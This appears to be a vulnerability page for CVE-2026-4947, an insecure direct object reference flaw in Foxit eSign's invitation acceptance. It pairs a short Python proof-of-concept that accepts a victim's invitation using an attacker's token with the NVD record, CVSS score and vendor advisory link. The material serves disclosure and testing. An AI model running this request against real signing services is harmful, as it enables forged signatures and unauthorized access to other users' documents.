CVE-2026-4947

import requests def test_idor_vulnerability(target_url, attacker_token, victim_invitation_id): """ PoC for CVE-2026-4947: IDOR in signing invitation acceptance. Attempts to accept a victim's invitation using an attacker's low-privilege token. """ headers = { "Authorization": f"Bearer {attacker_token}", "Content-Type": "application/json", "User-Agent": "CVE-2026-4947-Scanner" } # The vulnerable endpoint usually accepts a JSON payload with the invitation ID payload = { "invitation_id": victim_invitation_id, "action": "accept" } try: response = requests.post(target_url, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Potential IDOR vulnerability confirmed!") print(f"[+] Response: {response.text}") return True else: print(f"[-] Request failed with status code: {response.status_code}") print(f"[-] Response: {response.text}") return False except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") return False if __name__ == "__main__": # Example usage TARGET_API = "https://target.example.com/api/v1/invitations/accept" ATTACKER_TOKEN = "ATTACKER_LOW_PRIVILEGE_TOKEN_HERE" VICTIM_ID = "10023" # ID guessed or obtained belonging to another user test_idor_vulnerability(TARGET_API, ATTACKER_TOKEN, VICTIM_ID)

{"cve": {"id": "CVE-2026-4947", "sourceIdentifier": "14984358-7092-470d-8f34-ade47a7658a2", "published": "2026-04-01T02:16:03.740", "lastModified": "2026-04-27T13:14:44.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Addressed a potential insecure direct object reference (IDOR) vulnerability in the signing invitation acceptance process. Under certain conditions, this issue could have allowed an attacker to access or modify unauthorized resources by manipulating user-supplied object identifiers, potentially leading to forged signatures and compromising the integrity and authenticity of documents undergoing the signing process. The issue was caused by insufficient authorization validation on referenced resources during request processing."}, {"lang": "es", "value": "Se abordó una posible vulnerabilidad de referencia directa a objeto inseguro (IDOR) en el proceso de aceptación de invitación de firma. Bajo ciertas condiciones, este problema podría haber permitido a un atacante acceder o modificar recursos no autorizados manipulando identificadores de objeto proporcionados por el usuario, lo que podría llevar a firmas falsificadas y comprometer la integridad y autenticidad de los documentos en proceso de firma. El problema fue causado por una validación de autorización insuficiente en los recursos referenciados durante el procesamiento de solicitudes."}], "metrics": {"cvssMetricV31": [{"source": "14984358-7092-470d-8f34-ade47a7658a2", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "14984358-7092-470d-8f34-ade47a7658a2", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:foxit:esign:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026-03-26", "matchCriteriaId": "6BF12318-45A0-415D-B898-38513F760C3A"}]}]}], "references": [{"url": "https://www.foxit.com/support/security-bulletins.html", "source": "14984358-7092-470d-8f34-ade47a7658a2", "tags": ["Vendor Advisory"]}]}}